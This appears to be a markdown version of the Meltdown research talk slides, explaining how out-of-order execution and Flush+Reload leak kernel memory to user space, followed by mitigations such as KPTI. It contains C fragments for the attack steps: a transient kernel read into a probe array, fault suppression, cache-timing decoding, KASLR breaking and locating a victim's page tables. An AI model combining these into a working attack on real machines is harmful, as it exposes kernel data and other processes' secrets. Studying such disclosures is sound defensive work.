# Meltdown

Reading Kernel Memory from User Space

Moritz Lipp<sup>1</sup>, Michael Schwarz<sup>1</sup>, Daniel Gruss<sup>1</sup>, Thomas Prescher<sup>2</sup>, Werner Haas<sup>2</sup>, Anders Fogh<sup>3</sup>, Jann Horn<sup>4</sup>, Stefan Mangard<sup>1</sup>, Paul Kocher<sup>5</sup>, Daniel Genkin<sup>6</sup>, Yuval Yarom<sup>7</sup>, Mike Hamburg<sup>8</sup>

27th USENIX Security Symposium - August 16, 2018

<sup>1</sup>Graz University of Technology, <sup>2</sup>Cyberus Technology GmbH, <sup>3</sup>G-Data Advanced Analytics, <sup>4</sup>Google Project Zero, <sup>5</sup>Independent (www.paulkocher.com), <sup>6</sup>University of Michigan, <sup>7</sup>University of Adelaide & Data61, <sup>8</sup>Rambus, Cryptography Research Division









• Find something human readable, e.g., the Linux version










```
char data = *(char*) 0xffffffff81a000e0;
printf("%c\n", data);
```

- Any invalid access throws an exception $\rightarrow$ *segmentation fault*










- Kernel is isolated from user space
- This isolation is a combination of hardware and software
- User applications cannot access anything from the kernel










- CPUs support virtual address spaces to isolate processes
- Physical memory is organized in page frames
- Virtual memory pages are mapped to page frames using page tables

#### Address Translation on x86-64
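As a rough illustration of the translation step, the sketch below splits a virtual address into the table indices used by 4-level paging with 4 KiB pages (9 bits per level, 12-bit page offset). The struct and function names are made up for this example and are not taken from the slides.

```c
#include <stdint.h>

/* Indices extracted from a 48-bit x86-64 virtual address
 * (4-level paging, 4 KiB pages). Names are illustrative only. */
struct va_parts {
    unsigned pml4;    /* bits 47..39: index into the PML4 table */
    unsigned pdpt;    /* bits 38..30: index into the page directory pointer table */
    unsigned pd;      /* bits 29..21: index into the page directory */
    unsigned pt;      /* bits 20..12: index into the page table */
    unsigned offset;  /* bits 11..0:  byte offset inside the 4 KiB page */
};

static struct va_parts split_va(uint64_t va)
{
    struct va_parts p;
    p.pml4   = (unsigned)((va >> 39) & 0x1ff);
    p.pdpt   = (unsigned)((va >> 30) & 0x1ff);
    p.pd     = (unsigned)((va >> 21) & 0x1ff);
    p.pt     = (unsigned)((va >> 12) & 0x1ff);
    p.offset = (unsigned)(va & 0xfff);
    return p;
}
```

Calling `split_va(0xffffffff81a000e0)` yields the last PML4 entry (511), which is where kernel addresses in the upper part of the address space end up.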










• User/Supervisor bit defines in which privilege level the page can be accessed
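A minimal sketch of how that bit could be tested in a raw page-table entry, assuming the standard x86-64 flag layout (present = bit 0, read/write = bit 1, user/supervisor = bit 2). The macro and function names are hypothetical. On real hardware the bit has to be set at every level of the page-table walk, which this single-entry check does not model.

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_PRESENT (1ULL << 0)  /* P:   entry maps a page */
#define PTE_WRITE   (1ULL << 1)  /* R/W: page is writable */
#define PTE_USER    (1ULL << 2)  /* U/S: set = user-accessible, clear = supervisor only */

/* True if this single entry would allow a user-mode access. */
static bool user_may_access(uint64_t pte)
{
    return (pte & PTE_PRESENT) != 0 && (pte & PTE_USER) != 0;
}
```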










- Kernel is typically mapped into every address space
- Entire physical memory is mapped in the kernel



```
char data = *(char*) 0xffffffff81a000e0;
printf("%c\n", data);
```

- We try to load an inaccessible address
- Permission is checked






# Architecture and Microarchitecture










- Instruction Set Architecture (ISA) is an abstract model of a computer (x86, ARMv8, SPARC, ...)
- Serves as the interface between hardware and software
- Microarchitecture is an actual implementation of the ISA








## Side-channel Attacks






- Safe software infrastructure does not mean safe execution
- Information leaks because of the underlying hardware
- Exploit unintentional information leakage by side-effects





printf("%d", i); printf("%d", i);





































#### **Memory Access Latency**






#### Flush+Reload
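The two primitives behind Flush+Reload can be sketched as follows, assuming an x86-64 target and a GCC or Clang toolchain that ships `<x86intrin.h>`. The helper names `flush` and `time_access` are chosen for this example. A reload that comes back quickly suggests the line was cached, a slow one suggests it had to be fetched from memory. The cycle threshold separating the two is machine-specific and has to be calibrated.

```c
#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, _mm_mfence, __rdtscp (x86 only) */

/* Evict the cache line containing addr from the cache hierarchy. */
static void flush(const void *addr)
{
    _mm_clflush(addr);
    _mm_mfence();
}

/* Time a single load from addr in timestamp-counter cycles. */
static uint64_t time_access(const volatile char *addr)
{
    unsigned aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                      /* the load being measured */
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}
```

A typical use is to call `flush(p)`, let the victim run, and then compare `time_access(p)` against the calibrated threshold.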






































### Instructions are

- fetched and decoded in the front-end
- dispatched to the backend
- processed by individual execution units





### Instructions






- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute before earlier instructions
- retire in-order
  - State becomes architecturally visible
- Exceptions are checked during retirement
  - Flush pipeline and recover state





```
*(volatile char*) 0; // raise_exception();
array[84 * 4096] = 0;
```










• Flush+Reload over all pages of the array



- "Unreachable" code line was actually executed
- Exception was only thrown afterwards










- Out-of-order instructions leave microarchitectural traces
  - We can see them for example in the cache
- We call such instructions *transient instructions*
- We can indirectly observe the execution of transient instructions

# **Building blocks**









# **Executing transient instructions**






- Transient instructions are executed all the time
- Loading inaccessible addresses leads to a crash (segfault)
- How to prevent the crash?
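One possible answer, sketched here under the assumption of a POSIX system, is to catch the fault in a signal handler and jump back to a recovery point, so the process survives the illegal load. The function names are invented for this example, and the slides may use a different mechanism.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

static sigjmp_buf recover_point;

static void on_segv(int sig)
{
    (void)sig;
    siglongjmp(recover_point, 1);  /* resume at sigsetjmp instead of crashing */
}

/* Returns true if reading addr raised SIGSEGV, false if the load succeeded. */
static bool load_faults(const volatile char *addr)
{
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    bool faulted;
    if (sigsetjmp(recover_point, 1) == 0) {
        (void)*addr;        /* may raise SIGSEGV */
        faulted = false;
    } else {
        faulted = true;     /* reached via siglongjmp from the handler */
    }
    sigaction(SIGSEGV, &old, NULL);  /* restore the previous handler */
    return faulted;
}
```

Passing `1` as the second argument of `sigsetjmp` saves the signal mask, so SIGSEGV is unblocked again after the jump and the function can be called repeatedly.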






- Transfer of the microarchitectural state into an architectural state
- Transient instruction sequence is the sender
- Receiver receives the microarchitectural state change and deduces the secret from the state





- Leverage techniques from cache attacks: Flush+Reload
  - Transmit multiple bits at once
    - 256 different byte values $\Rightarrow$ access a different cache line for each value
  - Not limited to the cache
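The sender side of such a channel can be sketched as a lookup from byte value to a slot in a probe array. The names `probe_array` and `slot_for` are assumptions made for this example. The 4096-byte stride follows the `array[data * 4096]` pattern used in the slides' code, and using an unsigned byte keeps the index from going negative.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE  4096u
#define NUM_VALUES 256u   /* one slot per possible byte value */

static uint8_t probe_array[NUM_VALUES * PAGE_SIZE];

/* Sender side: touching the returned slot encodes `value`
 * in the cache state, one page per value. */
static volatile uint8_t *slot_for(uint8_t value)
{
    return &probe_array[(size_t)value * PAGE_SIZE];
}
```

A transient sequence would then perform something like `*slot_for(secret)`, and the receiver later checks which of the 256 slots became cached.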










• Add another layer of indirection to test

```
char data = *(char*) 0xffffffff81a000e0;
array[data * 4096] = 0;
```

• Then check whether any part of array is cached










• Flush+Reload over all pages of the array



- Index of cache hit reveals data
- Permission check is in some cases not fast enough
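The receiving step can be sketched as a scan over 256 measured reload latencies, one per page of the array. The function name, the latency array and the threshold parameter are assumptions for this example. Real measurements are noisy, so a practical receiver would likely repeat the measurement several times.

```c
#include <stdint.h>

#define NUM_VALUES 256  /* one probe page per possible byte value */

/* Returns the index of the fastest reload if it is below `threshold`
 * cycles, or -1 if no page looks cached. */
static int decode_byte(const uint64_t latency[NUM_VALUES], uint64_t threshold)
{
    int best = -1;
    uint64_t best_time = threshold;
    for (int i = 0; i < NUM_VALUES; i++) {
        if (latency[i] < best_time) {
            best_time = latency[i];
            best = i;
        }
    }
    return best;
}
```

If only page 84 reloads quickly, `decode_byte` returns 84, which is the leaked byte value.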











- Using out-of-order execution, we can read data at any address
- Index of cache hit reveals data
- Permission check is in some cases not fast enough
- Entire physical memory is typically accessible through kernel space

# Demo










- It was assumed that Meltdown can only read data stored in the L1 cache
- Experiment: one thread constantly flushes the value while a thread on a different core reloads it
  - Target data is not in the L1 cache of the attacking core
- We can still leak the data, at a lower reading rate
- Meltdown might implicitly cache the data




- Mark pages in page tables as UC (uncacheable)
  - Every read or write operation will go to main memory
- If the attacker can trigger a legitimate load (system call, ...) on the same CPU core, the data still can be leaked
- Meltdown might read the data from one of the fill buffers
  - as they are shared between threads running on the same core






- Intel: Almost every CPU
- AMD: Seems not to be affected
- ARM: Only the Cortex-A75
- IBM: System Z, Power Architecture, POWER8 and POWER9
- Apple: All Mac and iOS devices





#### Samsung Galaxy S7






- Exynos Mongoose M1 CPU Architecture
  - Custom CPU core in the Exynos 8 Octa (8890)
  - Perceptron Branch Prediction
  - Full Out-of-Order Instruction Execution
    - Full Out-of-Order loads and stores










- Dumping the entire physical memory takes some time
  - L1: 582 KB/s
  - L3: 12.4 KB/s
  - Uncached: 10 B/s (improved: 3.2 KB/s)
- Not very practical in most scenarios
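To put these rates in perspective, the following sketch computes how long a full dump would take. It assumes 8 GiB of physical memory and 1 KB = 1000 bytes, both of which are assumptions for this example rather than figures from the slides.

```c
#include <stdint.h>

/* Seconds needed to read `bytes` at `rate_bytes_per_s`, rounded up. */
static uint64_t dump_seconds(uint64_t bytes, uint64_t rate_bytes_per_s)
{
    return (bytes + rate_bytes_per_s - 1) / rate_bytes_per_s;
}
```

With these assumptions, `dump_seconds(8ULL << 30, 582000)` gives 14760 seconds (about 4 hours) at the L1 rate, while the uncached rate of 10 B/s gives 858993460 seconds, which is roughly 27 years.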






# **Breaking KASLR**






- De-randomize KASLR to access internal kernel structures
- Locate a known value inside the kernel, e.g., Linux banner
  - Start at the default address according to the symbol table of the running kernel
  - Linux KASLR has an entropy of 6 bits  $\Rightarrow$  only 64 possible randomization offsets
- Difference between the found address and the non-randomized base address is the randomization offset
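The search over the 64 candidates can be sketched as a simple loop. The probe callback, the step size between candidates and the simulated banner location are all hypothetical and exist only to make the example self-contained. In a real attack the probe would read the candidate address through Meltdown and compare it with the known value.

```c
#include <stdbool.h>
#include <stdint.h>

#define KASLR_SLOTS 64  /* 6 bits of entropy => 64 candidate offsets */

/* Hypothetical probe: true if the known value is found at `addr`. */
typedef bool (*probe_fn)(uint64_t addr);

/* Simulation only: pretend the known value lives at this address. */
static uint64_t simulated_banner_addr;
static bool simulated_probe(uint64_t addr)
{
    return addr == simulated_banner_addr;
}

/* Tries every candidate slot. On success, stores the randomization offset
 * (found address minus non-randomized default address) and returns true. */
static bool find_kaslr_offset(uint64_t default_addr, uint64_t step,
                              probe_fn probe, uint64_t *offset_out)
{
    for (uint64_t slot = 0; slot < KASLR_SLOTS; slot++) {
        uint64_t candidate = default_addr + slot * step;
        if (probe(candidate)) {
            *offset_out = candidate - default_addr;
            return true;
        }
    }
    return false;
}
```

Once the offset is known, it can be added to any other default symbol address to locate that symbol in the running kernel.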






# Locating the victim process










- Linux manages all processes in a linked list
- Head of the list is stored in the init\_task structure
  - At a fixed offset that varies only among kernel builds
- Each task structure in the list contains a pointer to the next task and
  - PID of the task
  - Name of the task
  - Root of the multi-level page table
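The list walk can be modeled with a simplified structure, as in the sketch below. The `struct task` here is a stand-in invented for this example and does not match the real kernel layout. In an actual attack every field would be read from kernel memory through Meltdown rather than through ordinary pointers.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for a kernel task entry (NOT the real layout). */
struct task {
    struct task *next;      /* pointer to the next task (circular list) */
    int          pid;       /* PID of the task */
    char         name[16];  /* name of the task */
    uint64_t     pgd;       /* root of the multi-level page table */
};

/* Walks the circular list starting at `head` and returns the first task
 * whose name matches, or NULL if none does. */
static const struct task *find_task(const struct task *head, const char *name)
{
    const struct task *t = head;
    do {
        if (strncmp(t->name, name, sizeof t->name) == 0)
            return t;
        t = t->next;
    } while (t != head);
    return NULL;
}
```

The page-table root of the matching entry is what the next step needs in order to translate the victim's virtual addresses.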










- Resolve physical address using paging structures
- Read the content using the direct-physical map
- Enumerate all mapped pages and dump entire process memory
- If the location of the key is known, we can dump the key directly
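The last two address computations can be sketched as follows: extracting the physical frame address from a page-table entry, then turning it into a kernel virtual address inside the direct-physical map. The base address used here is an assumption (the value used by older Linux x86-64 kernels without KASLR); with KASLR it would have to be discovered first. The function names are made up for this example.

```c
#include <stdint.h>

/* Assumed base of the direct-physical map (older Linux x86-64, no KASLR). */
#define DIRECT_MAP_BASE 0xffff880000000000ULL

/* Bits 51..12 of a page-table entry hold the physical frame address. */
#define PTE_FRAME_MASK  0x000ffffffffff000ULL

static uint64_t pte_frame(uint64_t pte)
{
    return pte & PTE_FRAME_MASK;
}

/* Kernel virtual address at which physical address `phys` is mapped. */
static uint64_t phys_to_direct_virt(uint64_t phys, uint64_t direct_map_base)
{
    return direct_map_base + phys;
}
```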








- Problem is rooted in hardware
- Race condition between the memory fetch and corresponding permission check
  - Serialize both of them
- Hard split of user space and kernel space
  - New bit in control register
- Fix the hardware $\rightarrow$ long-term solution
- Can we fix it in software?

**KAISER** 



















- KAISER [Gru+17] was published in May 2017 ...
- ... as a countermeasure against other side-channel attacks
- Inadvertently defeats Meltdown as well










- Linux: Kernel Page-table Isolation (KPTI)
- Apple: Released updates
- Windows: Kernel Virtual Address (KVA) Shadow





You can find our proof-of-concept implementation at:

• https://github.com/IAIK/meltdown

#### Conclusion





- Microarchitectural attacks were underestimated for a long time
- Meltdown allows reading arbitrary kernel memory from user space
- It affects millions of devices from various CPU manufacturers
- Countermeasures come with a performance impact
